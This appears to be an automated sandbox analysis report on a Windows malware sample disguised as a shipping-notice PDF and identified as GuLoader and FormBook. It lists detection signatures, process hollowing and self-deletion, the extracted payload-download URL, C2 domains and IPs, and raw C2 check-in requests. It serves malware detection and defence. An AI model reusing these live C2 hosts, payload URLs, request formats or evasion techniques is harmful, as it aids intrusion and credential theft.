Loading ...

Play interactive tourEdit tour

Windows Analysis Report Arrival Notice, CIA Awb Inv Form.pdf.exe

Overview

General Information

Sample Name:Arrival Notice, CIA Awb Inv Form.pdf.exe
Analysis ID:527894
MD5:ff71941571d8930c1125b3931d400d86
SHA1:0a417bf568a5978777021e433bf4693893facd3e
SHA256:bf952f1cd44de7bf63c63e502670d3a6a97eca1b5f7fd9981ed0d235351e975f
Infos:

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses an obfuscated file name to hide its real file extension (double extension)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • Arrival Notice, CIA Awb Inv Form.pdf.exe (PID: 4636 cmdline: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" MD5: FF71941571D8930C1125B3931D400D86)
    • Arrival Notice, CIA Awb Inv Form.pdf.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" MD5: FF71941571D8930C1125B3931D400D86)
      • explorer.exe (PID: 4672 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • NETSTAT.EXE (PID: 5904 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 9DB170ED520A6DD57B5AC92EC537368A)
          • cmd.exe (PID: 3516 cmdline: /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=16igyruBe"}

Threatname: FormBook

{"C2 list": ["www.papllc.biz/s3f1/"], "decoy": ["teslaislandbois.com", "teslafreesuperchargermiles.com", "wifibudddy.sbs", "spmr.tv", "rossatospa.com", "crypto-cardano.com", "mvsteals.com", "amazonsellwithdiscount.com", "safety1-venture.us", "hara.cloud", "musee-radix-hairsalon.com", "celsb.com", "leaureveedhubert.com", "bncmobile.com", "bptrix.xyz", "wawadecoration.com", "redirect-amazones.com", "baseballinformatics.com", "predator.rest", "heinzelmaennchenltd.net", "metafacebookmessenger.com", "izivente.com", "evaccines.com", "alexacoyne.com", "emansdesign.com", "donefirsr.com", "ramel.us", "homie-hairsalon.com", "renatotomatis.com", "thecryptofirm.us", "4mtechmachines.com", "thaicharuen.com", "alexanderferency.com", "facebook-meta-morphosis.com", "spaziofellowes.com", "eggchanceapple.top", "trust2-profit.us", "investmenofpairs.club", "a.town", "soarlikeaneagle.site", "itssscraftingxo.com", "721369.online", "cornershopgoodwill.com", "programagubernamental.xyz", "siluca.biz", "rivianhawaii.com", "c2sh32.com", "meta-facebook.net", "amazonasmidia.com", "tmjuber.com", "venomous.kr", "stratosbuilder.com", "unitedlegalsolutions.us", "qivem.top", "federal-funds-deposit.com", "morningstarapparel.space", "verlag.us", "wwwdonefirst.com", "meta-morphosisfacebook.com", "mvrsfacebook.ca", "founditonamazon.net", "shellyperkowski.com", "firstsolar-s.com", "viiew.co"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x5839:$sqlite3step: 68 34 1C 7B E1
    • 0x594c:$sqlite3step: 68 34 1C 7B E1
    • 0x5868:$sqlite3text: 68 38 2A 90 C5
    • 0x598d:$sqlite3text: 68 38 2A 90 C5
    • 0x587b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x59a3:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x26a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x2191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x27a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x291f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x140c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x8917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x991a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x1c418:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x1c410:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    Click to see the 22 entries

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Suspicious Double ExtensionShow sources
    Source: Process startedAuthor: Florian Roth (rule), @blu3_team (idea): Data: Command: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" , CommandLine: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, NewProcessName: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" , ParentImage: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe, ParentProcessId: 4636, ProcessCommandLine: "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe" , ProcessId: 7132

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.papllc.biz/s3f1/"], "decoy": ["teslaislandbois.com", "teslafreesuperchargermiles.com", "wifibudddy.sbs", "spmr.tv", "rossatospa.com", "crypto-cardano.com", "mvsteals.com", "amazonsellwithdiscount.com", "safety1-venture.us", "hara.cloud", "musee-radix-hairsalon.com", "celsb.com", "leaureveedhubert.com", "bncmobile.com", "bptrix.xyz", "wawadecoration.com", "redirect-amazones.com", "baseballinformatics.com", "predator.rest", "heinzelmaennchenltd.net", "metafacebookmessenger.com", "izivente.com", "evaccines.com", "alexacoyne.com", "emansdesign.com", "donefirsr.com", "ramel.us", "homie-hairsalon.com", "renatotomatis.com", "thecryptofirm.us", "4mtechmachines.com", "thaicharuen.com", "alexanderferency.com", "facebook-meta-morphosis.com", "spaziofellowes.com", "eggchanceapple.top", "trust2-profit.us", "investmenofpairs.club", "a.town", "soarlikeaneagle.site", "itssscraftingxo.com", "721369.online", "cornershopgoodwill.com", "programagubernamental.xyz", "siluca.biz", "rivianhawaii.com", "c2sh32.com", "meta-facebook.net", "amazonasmidia.com", "tmjuber.com", "venomous.kr", "stratosbuilder.com", "unitedlegalsolutions.us", "qivem.top", "federal-funds-deposit.com", "morningstarapparel.space", "verlag.us", "wwwdonefirst.com", "meta-morphosisfacebook.com", "mvrsfacebook.ca", "founditonamazon.net", "shellyperkowski.com", "firstsolar-s.com", "viiew.co"]}
    Source: 00000006.00000000.22299792619.0000000000560000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=16igyruBe"}
    Multi AV Scanner detection for submitted fileShow sources
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exeVirustotal: Detection: 37%Perma Link
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exeReversingLabs: Detection: 31%
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49805 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49806 version: TLS 1.2
    Source: Binary string: netstat.pdbGCTL source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
    Source: Binary string: netstat.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdbUGP source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp
    Source: Binary string: wntdll.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop esi8_2_0281731A

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80
    Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80
    Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 34.102.136.180:80
    Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80
    Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80
    Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 35.198.112.85:80
    Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80
    Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80
    Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49826 -> 184.168.98.97:80
    Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80
    Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80
    Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 34.102.136.180:80
    System process connects to network (likely due to code injection or exploit)Show sources
    Source: C:\Windows\explorer.exeNetwork Connect: 154.94.229.8 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 107.178.157.225 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 35.198.112.85 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 70.40.220.123 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 183.181.99.12 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 184.168.98.97 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80Jump to behavior
    Uses netstat to query active network connections and open portsShow sources
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=16igyruBe
    Source: Malware configuration extractorURLs: www.papllc.biz/s3f1/
    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
    Source: Joe Sandbox ViewASN Name: ROOTNETWORKSUS ROOTNETWORKSUS
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.izivente.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.musee-radix-hairsalon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.teslafreesuperchargermiles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.mvsteals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.thaicharuen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=UFnETU8dieTu408infxPFcIZ9A51JABruIfjxtzTo70f1rUHWxHKXlzNhsAQN9Kxpi4c&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.morningstarapparel.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.soarlikeaneagle.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.evaccines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.celsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp HTTP/1.1Host: www.4mtechmachines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlp HTTP/1.1Host: www.hara.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: Joe Sandbox ViewIP Address: 64.190.62.111 64.190.62.111
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-5s-docs.googleusercontent.comConnection: Keep-Alive
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 24 Nov 2021 14:09:53 GMTContent-Type: text/htmlContent-Length: 275ETag: "6197bde3-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 24 Nov 2021 14:10:33 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be74a-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Nov 2021 14:12:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 24 Nov 2021 14:14:34 GMTContent-Type: text/htmlContent-Length: 275ETag: "61951b77-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
